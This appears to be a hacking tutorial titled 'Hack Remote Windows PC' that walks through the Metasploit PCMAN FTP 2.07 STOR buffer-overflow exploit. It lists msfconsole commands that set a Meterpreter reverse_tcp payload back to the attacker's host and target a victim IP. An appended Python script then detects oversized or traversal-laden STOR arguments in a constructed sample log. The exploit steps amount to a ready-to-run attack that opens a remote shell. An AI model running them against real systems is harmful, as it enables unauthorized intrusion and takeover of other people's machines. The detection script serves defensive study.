Hack Remote Windows PC Using PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow

This Metasploit module exploits a buffer overflow vulnerability found in the STOR command of the PCMAN FTP version 2.07 server when the "/../" parameters are also sent to the server. Please note authentication is required in order to trigger the vulnerability. The overflowing string will also be seen on the FTP server log console.

Exploit Targets
PCMAN FTP version 2.07

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open a Kali Linux terminal and type msfconsole


Now type use exploit/windows/ftp/pcman_stor
msf exploit (pcman_stor)>set payload windows/meterpreter/reverse_tcp
msf exploit (pcman_stor)>set lhost 192.168.1.4 (IP of Local Host)
msf exploit (pcman_stor)>set rhost 192.168.1.5 (IP of victim PC)
msf exploit (pcman_stor)>exploit 
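
On the defensive side, the description above notes that the overflowing string is written to the FTP server log, which makes oversized STOR arguments a usable detection point. The Python script below is an added example, not part of the original post or of the Metasploit module; the log line format, the 260-character threshold and the function names are assumptions, and the sample log is constructed.

```python
import re

# Assumed threshold: legitimate STOR arguments (file paths) are rarely longer
# than this; tune it for the environment.
MAX_ARG_LEN = 260

# Matches an FTP STOR command anywhere in a log line and captures its argument.
STOR_RE = re.compile(r"\bSTOR\s+(?P<arg>.*)$", re.IGNORECASE)


def suspicious_stor(line, max_len=MAX_ARG_LEN):
    """Return a list of reasons the line looks like a STOR overflow attempt."""
    m = STOR_RE.search(line.rstrip("\r\n"))
    if not m:
        return []
    arg = m.group("arg")
    reasons = []
    if len(arg) > max_len:
        reasons.append(f"STOR argument is {len(arg)} characters (limit {max_len})")
    if "/../" in arg or "\\..\\" in arg:
        reasons.append("STOR argument contains a path traversal sequence")
    if any(ord(c) < 0x20 or ord(c) > 0x7E for c in arg):
        reasons.append("STOR argument contains non-printable bytes")
    return reasons


def scan(lines, max_len=MAX_ARG_LEN):
    """Yield (line_number, reasons) for every flagged log line."""
    for n, line in enumerate(lines, 1):
        reasons = suspicious_stor(line, max_len)
        if reasons:
            yield n, reasons


# Constructed sample log; the format is hypothetical, not PCMAN's actual output.
SAMPLE_LOG = [
    "2014/01/10 [10:02] (00012) 192.168.1.4> USER anonymous",
    "2014/01/10 [10:02] (00012) 192.168.1.4> PASS ****",
    "2014/01/10 [10:03] (00012) 192.168.1.4> STOR report.txt",
    "2014/01/10 [10:04] (00013) 192.168.1.4> STOR /../" + "A" * 2000,
    "2014/01/10 [10:05] (00014) 192.168.1.4> STOR /../notes.txt",
]

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: " + "; ".join(reasons))
```

A traversal sequence on its own (line 5 of the sample) is worth reviewing but is a weaker signal than traversal combined with an oversized argument (line 4).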

